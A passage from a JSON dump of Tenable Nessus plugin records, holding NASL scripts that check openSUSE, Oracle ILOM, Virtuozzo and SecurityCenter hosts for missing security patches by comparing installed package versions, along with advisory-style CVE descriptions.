Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader\n resolvables (boo#1108175)", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2018-1005.NASL", "href": "https://www.tenable.com/plugins/nessus/117518", "published": "2018-09-17T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2018-1005)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1005.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117518);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/17 12:21:53\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2018-1005)\");\n script_summary(english:\"Check for the openSUSE-2018-1005 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for Chromium to version 69.0.3497.92 fixes the following\nissues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader\n resolvables (boo#1108175)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108175\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-69.0.3497.92-171.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-01T03:05:32", "bulletinFamily": "scanner", "description": "This update for blueman fixes the following issues :\n\nThe following security issue was addressed :\n\n - Fixed the polkit authorization checks in blueman, which\n previously allowed any user with access to the D-Bus\n system bus to trigger certain network configuration\n logic in blueman without authentication (boo#1083066).", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2018-855.NASL", "href": "https://www.tenable.com/plugins/nessus/111636", "published": "2018-08-10T00:00:00", "title": "openSUSE Security Update : blueman (openSUSE-2018-855)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-855.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111636);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/08/10 11:41:20\");\n\n script_name(english:\"openSUSE Security Update : blueman (openSUSE-2018-855)\");\n script_summary(english:\"Check for the openSUSE-2018-855 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for blueman fixes the following issues :\n\nThe following security issue was addressed :\n\n - Fixed the polkit authorization checks in blueman, which\n previously allowed any user with access to the D-Bus\n system bus to trigger certain network configuration\n logic in blueman without authentication (boo#1083066).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1083066\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected blueman packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:blueman-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:thunar-sendto-blueman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-debuginfo-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-debugsource-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"blueman-lang-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"thunar-sendto-blueman-2.0.6-lp150.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-debuginfo-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-debugsource-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"blueman-lang-2.0.6-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"thunar-sendto-blueman-2.0.6-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"blueman / blueman-debuginfo / blueman-debugsource / blueman-lang / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-17T19:12:07", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the version of Oracle\nIntegrated Lights Out Manager (ILOM) is affected by multiple vulnerabilities\nas described in the advisory.", "modified": "2019-11-02T00:00:00", "id": "ORACLE_ILOM_3_2_6.NASL", "href": "https://www.tenable.com/plugins/nessus/104047", "published": "2017-10-20T00:00:00", "title": "Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104047);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2016-6304\",\n \"CVE-2016-7431\",\n \"CVE-2017-3588\",\n \"CVE-2017-10099\",\n \"CVE-2017-10194\",\n \"CVE-2017-10260\",\n \"CVE-2017-10265\",\n \"CVE-2017-10275\"\n );\n script_bugtraq_id(\n 93150,\n 94454,\n 101426,\n 101431,\n 101435,\n 101437,\n 101442,\n 101445\n );\n\n script_name(english:\"Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Oracle\nIntegrated Lights Out Manager (ILOM) is affected by multiple vulnerabilities\nas described in the advisory.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e07fa0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Integrated Lights Out Manager (ILOM) 3.2.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10265\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sun:embedded_lights_out_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:integrated_lights_out_manager_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_ilom_web_detect.nasl\");\n script_require_keys(\"installed_sw/ilom\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:\"ilom\", exit_if_zero:TRUE);\n\nport = get_http_port(default:443);\napp = \"Oracle ILOM\";\n\ninstall = get_single_install(\n app_name : \"ilom\",\n port : port,\n exit_if_unknown_ver : TRUE\n );\nversion = install[\"version\"];\npath = install[\"path\"];\nurl = build_url(port:port, qs:path);\n\nfix = \"3.2.6\";\n\nif (ver_compare(ver:version, fix:fix) == -1)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-27T10:13:13", "bulletinFamily": "scanner", "description": "An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0906.NASL", "href": "https://www.tenable.com/plugins/nessus/101445", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101445);\n script_version(\"1.78\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-8743\"\n );\n\n script_name(english:\"Virtuozzo 7 : httpd / httpd-devel / httpd-manual / httpd-tools / etc (VZLSA-2017-0906)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for httpd is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nSecurity Fix(es) :\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\nNote: The fix for the CVE-2016-8743 issue causes httpd to return '400\nBad Request' error to HTTP clients which do not strictly follow HTTP\nprotocol specification. A newly introduced configuration directive\n'HttpProtocolOptions Unsafe' can be used to re-enable the old less\nstrict parsing. However, such setting also re-introduces the\nCVE-2016-8743 issue.\n\nBug Fix(es) :\n\n* When waking up child processes during a graceful restart, the httpd\nparent process could attempt to open more connections than necessary\nif a large number of child processes had been active prior to the\nrestart. Consequently, a graceful restart could take a long time to\ncomplete. With this update, httpd has been fixed to limit the number\nof connections opened during a graceful restart to the number of\nactive children, and the described problem no longer occurs.\n(BZ#1420002)\n\n* Previously, httpd running in a container returned the 500 HTTP\nstatus code (Internal Server Error) when a connection to a WebSocket\nserver was closed. As a consequence, the httpd server failed to\ndeliver the correct HTTP status and data to a client. With this\nupdate, httpd correctly handles all proxied requests to the WebSocket\nserver, and the described problem no longer occurs. (BZ#1429947)\n\n* In a configuration using LDAP authentication with the\nmod_authnz_ldap module, the name set using the AuthLDAPBindDN\ndirective was not correctly used to bind to the LDAP server for all\nqueries. Consequently, authorization attempts failed. The LDAP modules\nhave been fixed to ensure the configured name is correctly bound for\nLDAP queries, and authorization using LDAP no longer fails.\n(BZ#1420047)\n\nNote that Tenable Network Security has attempted to extract the\npreceding description block directly from the corresponding Red Hat\nsecurity advisory. Virtuozzo provides no description for VZLSA\nadvisories. Tenable has attempted to automatically clean and format\nit as much as possible without introducing additional issues.\");\n # http://repo.virtuozzo.com/vzlinux/announcements/json/VZLSA-2017-0906.json\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d35048\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2017-0906\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected httpd / httpd-devel / httpd-manual / httpd-tools / etc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"httpd-2.4.6-45.vl7.4\",\n \"httpd-devel-2.4.6-45.vl7.4\",\n \"httpd-manual-2.4.6-45.vl7.4\",\n \"httpd-tools-2.4.6-45.vl7.4\",\n \"mod_ldap-2.4.6-45.vl7.4\",\n \"mod_proxy_html-2.4.6-45.vl7.4\",\n \"mod_session-2.4.6-45.vl7.4\",\n \"mod_ssl-2.4.6-45.vl7.4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-01T03:29:40", "bulletinFamily": "scanner", "description": "The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as ", "modified": "2019-11-02T00:00:00", "id": "SECURITYCENTER_APACHE_2_4_25.NASL", "href": "https://www.tenable.com/plugins/nessus/101044", "published": "2017-06-26T00:00:00", "title": "Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101044);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/03/27 13:17:50\");\n\n script_cve_id(\n \"CVE-2016-0736\",\n \"CVE-2016-2161\",\n \"CVE-2016-5387\",\n \"CVE-2016-8740\",\n \"CVE-2016-8743\"\n );\n script_bugtraq_id(\n 91816,\n 94650,\n 95076,\n 95077,\n 95078\n );\n script_xref(name:\"CERT\", value:\"797896\");\n script_xref(name:\"EDB-ID\", value:\"40961\");\n\n script_name(english:\"Tenable SecurityCenter Apache 2.4.x < 2.4.25 Multiple Vulnerabilities (TNS-2017-04) (httpoxy)\");\n script_summary(english:\"Checks the version of Apache in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Tenable SecurityCenter application on the remote host contains a\nweb server that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Tenable SecurityCenter application installed on the remote host\nis missing a security patch. It is, therefore, affected by multiple\nvulnerabilities in the bundled version of Apache :\n\n - A flaw exists in the mod_session_crypto module due to\n encryption for data and cookies using the configured\n ciphers with possibly either CBC or ECB modes of\n operation (AES256-CBC by default). An unauthenticated,\n remote attacker can exploit this, via a padding oracle\n attack, to decrypt information without knowledge of the\n encryption key, resulting in the disclosure of\n potentially sensitive information. (CVE-2016-0736)\n\n - A denial of service vulnerability exists in the\n mod_auth_digest module during client entry allocation.\n An unauthenticated, remote attacker can exploit this,\n via specially crafted input, to exhaust shared memory\n resources, resulting in a server crash. (CVE-2016-2161)\n\n - The Apache HTTP Server is affected by a\n man-in-the-middle vulnerability known as 'httpoxy' due\n to a failure to properly resolve namespace conflicts in\n accordance with RFC 3875 section 4.1.18. The HTTP_PROXY\n environment variable is set based on untrusted user data\n in the 'Proxy' header of HTTP requests. The HTTP_PROXY\n environment variable is used by some web client\n libraries to specify a remote proxy server. An\n unauthenticated, remote attacker can exploit this, via a\n crafted 'Proxy' header in an HTTP request, to redirect\n an application's internal HTTP traffic to an arbitrary\n proxy server where it may be observed or manipulated.\n (CVE-2016-5387)\n\n - A denial of service vulnerability exists in the\n mod_http2 module due to improper handling of the\n LimitRequestFields directive. An unauthenticated, remote\n attacker can exploit this, via specially crafted\n CONTINUATION frames in an HTTP/2 request, to inject\n unlimited request headers into the server, resulting in\n the exhaustion of memory resources. (CVE-2016-8740)\n\n - A flaw exists due to improper handling of whitespace\n patterns in user-agent headers. An unauthenticated,\n remote attacker can exploit this, via a specially\n crafted user-agent header, to cause the program to\n incorrectly process sequences of requests, resulting in\n interpreting responses incorrectly, polluting the cache,\n or disclosing the content from one request to a second\n downstream user-agent. (CVE-2016-8743)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2017-04\");\n script_set_attribute(attribute:\"see_also\", value:\"https://static.tenable.com/prod_docs/upgrade_security_center.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Tenable SecurityCenter version 5.4.3 or later.\nAlternatively, contact the vendor for a patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"manual\");\n script_set_attribute(attribute:\"cvss_score_rationale\", value:\"Score based on analysis of the vendor advisory.\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n \n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n 